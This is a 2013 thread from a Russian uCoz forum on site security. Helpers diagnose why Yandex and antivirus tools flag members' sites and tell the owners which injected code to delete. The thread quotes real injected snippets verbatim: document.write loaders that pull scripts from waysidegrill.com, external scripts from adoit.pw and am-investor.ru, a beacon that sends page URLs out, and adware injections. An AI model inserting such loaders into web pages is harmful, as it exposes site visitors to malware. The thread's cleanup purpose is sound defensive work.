Модератор форума: Yuri_G |
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
Вирусы на сайтах |
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
Batyanya,
Цитата |
Огромная просьба помочь найти, почему Яндекс стал считать сайт вредоносным. В частности три выборочные страницы. Обратил внимание, что в конце появился скрипт openstat с другим ID (см. код страницы после /html). При этом мой ID другой (можно посмотреть подключение скрипта выше по поиску по openstat2328252). Может быть проблема в этом?
22.11.2013 http://www.qgaming.ws/forum/23-182-1 Mal/Iframe-AO 26.11.2013 http://www.qgaming.ws/forum/35-363-1 Mal/Iframe-AO 22.11.2013http://www.qgaming.ws/publ/other/nastrojka_strelby_v_cs_1_6/4-1-0-62 Mal/Iframe-AO Q.GaminG
Сообщение отредактировал oOps - Пятница, 29 Ноя 2013, 21:59:31
|
oOps, вот это уберите
Код <!-- a2web --> <script type="text/javascript"><!-- document.write("<img src='//xn--80aedtzeohhx5l.xn--p1ai/stats.php?url="+escape(document.URL)+"&ref="+escape(document.referrer)+"' border='0' width='1' height='1'>") //--></script> <!-- /a2web --> далее. зараженный скрипт http://www.qgaming.ws/scripts/aquotator.js удалить вставку Код /*f598ca*/ document.write('<script src="http://waysidegrill.com/_NEW/G9RU1v78.php?id=30638977" type="text/javascript"></script>'); /*/f598ca*/ далее зараженный скрипт http://www.qgaming.ws/scripts/antimat. удалить вставку Код /*5620dc*/ document.write('<script src="http://waysidegrill.com/_NEW/G9RU1v78.php?id=30638976" type="text/javascript"></script>'); /*/5620dc*/ зараженный скрипт http://www.qgaming.ws/v2/js/one.js удалить вставку Код /*c5dfe4*/ document.write('<script src="http://waysidegrill.com/_NEW/G9RU1v78.php?id=30638991" type="text/javascript"></script>'); /*/c5dfe4*/ в общем все тысяча и один скрипт, залитые на ваш сайт заражены. после очистки каждого меняем все пароли. меняем пароль на фтп. ставим самый страшный набор буков и циферь, которые способны придумать и забываем его. перед каждым использованием фтп можно придумывать новый страшный пароль при этом не вводя старый |
На этой странице обнаружена циклическая переадресация
Загрузка веб-страницы по адресуhttp://skleroza.ucoz.net/video/vip/32/k'omedi_shou/nik/'olozi_da_tsismari_comedy_shou вызвала слишком много переадресаций. Попробуйте очистить для этого сервера файлы cookie или разрешить их прием от независимых сайтов. Если это не поможет, возможно, проблема связана не с вашим компьютером, а с конфигурацией сервера. Подробнее об этой неполадке. Код ошибки: ERR_TOO_MANY_REDIRECTS |
skleroza, на вашем сайте обнаружен вредоносный код
из блока შემოგვიერთდით удалить скрипт Код <script type="text/javascript" src="http://adoit.pw/border.js"></script> из шаблонов мини-чата удалить скрипт Код <script src="http://am-investor.ru/higer.js" type="text/javascript"></script> |
добрый вечер.
не могу вообще зайти на сайт. и перед этим Аваст все время выдавал угрозу, к сожалению не сделала копию. Угрозу выдавало при заходе на любую страницу сайта, на разных браузерах, и так же с мобильного. клиенты так же жаловались адрес сайта www.artynails-shop.com |
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Сообщение отредактировал Вишинка - Среда, 04 Дек 2013, 12:45:28
|
Solovushka, разберитесь со своей рекламой на сайте. реагировать может на рекламу от cdnsrv.com которая у вас дублируется на сайте
также это стоит удалить Код <script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={E6A663CA-D48C-45F6-AEB4-E5B5D998CEE7}&d=2013-07-22&s=http://artynails.ucoz.ru/panel/?a=wysiwyg;f=tmpl;m=1;t=AHEADER;frag=1&cb=0.09763571892130818"> //<![CDATA[ //]]> </script><script type="text/javascript" id="__changoScript"> //<![CDATA[ var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); //]]> </script><script type="text/javascript" id="__simpliScript" src="http://i.simpli.fi/dpx.js?cid=3065&m=0" data-sifi-parsed="true"> //<![CDATA[ //]]> </script><script src="http://static.cdnsrv.com/apps/tv-classic/selectionLinks/tv-classic-selectionlinks.js" type="text/javascript"> //<![CDATA[ //]]> </script><script type="text/javascript" src="//static.cdnsrv.com/apps/tv-classic/tv-classic-fg.js"> //<![CDATA[ //]]> </script><script type="text/javascript" src="http://i.selectionlinksjs.info/obfy/javascript.js"> //<![CDATA[ //]]> </script> и вот эти все вставки Код <div id="__tbSetup"> </div><script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={E6A663CA-D48C-45F6-AEB4-E5B5D998CEE7}&d=2013-07-22&s=http://artynails.ucoz.ru/panel/?a=wysiwyg;f=tmpl;m=20;t=1&cb=0.7421682026991508"> //<![CDATA[ //]]> </script><script type="text/javascript" id="__changoScript"> //<![CDATA[ var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); //]]> </script><script type="text/javascript" id="__simpliScript" src="http://i.simpli.fi/dpx.js?cid=3065&m=0" data-sifi-parsed="true"> //<![CDATA[ //]]> </script><script src="http://static.cdnsrv.com/apps/tv-classic/selectionLinks/tv-classic-selectionlinks.js" type="text/javascript"> //<![CDATA[ //]]> </script><script type="text/javascript" src="//static.cdnsrv.com/apps/tv-classic/tv-classic-fg.js"> //<![CDATA[ //]]> </script><script type="text/javascript" src="http://i.selectionlinksjs.info/obfy/javascript.js"> //<![CDATA[ //]]> </script></body><script src="http://i.selectionlinksjs.info/opt_1377778881461/opt_content.js?partner=obfy&channel=obfy&appTitle=" type="application/x-javascript"> //<![CDATA[ //]]> </script> мне кажется вам не стоит пользоваться браузером в визуальном режиме на сайте. возможно ваши расширения оставляют такой след |
Доброе время суток. Вчера некоторые пользователи пожаловались на то, что получают предупреждение о том,что Яндекс считает наш сайт вредоносным.Сайт обращается на страницу ucoz-lab.ucoz.ru, где находится вредоносный код Mal/Iframe-AO (по данным компании Sophos). Не поможете разобраться с этим? Наш сайт - http://megrinskaya.com Спасибо. Прикрепления:
9798309.jpg
(131.7 Kb)
Сообщение отредактировал pazoviy045 - Среда, 04 Дек 2013, 19:59:46
|
pazoviy045, удалите
Код <!-- прокрутка от ucoz-lab.ucoz.ru --> <a href="#" id="toTop"><img src="http://ucoz-lab.ucoz.ru/adbar/to_top.gif" border="0" align="absmiddle" /></a> <script src="http://ucoz-lab.ucoz.ru/adbar/jquery.scroll.pack.js" type="text/javascript"></script> <script type="text/javascript"> $(function() { $("#toTop").scrollToTop(); }); </script> <style> #toTop { width: 40 px; text-align: center; padding: 5px; position: fixed; bottom: 10px; right: 10px; cursor: pointer; color: #666666; text-decoration: none; } </style> <!-- / прокрутка от ucoz-lab.ucoz.ru --> |
webanet, Cпасибо!!!! Учюсь...
|
Здравствуйте ! Не могу на своем сайте sharing-sat.ru найти не желательную ссылку activiks.ru/img/png.js подскажите кто знает где именно она находится ? Это скорее всего где-то в скрипте. Заранее благодарю!
Сообщение отредактировал red4045 - Четверг, 05 Дек 2013, 04:05:44
|
| |||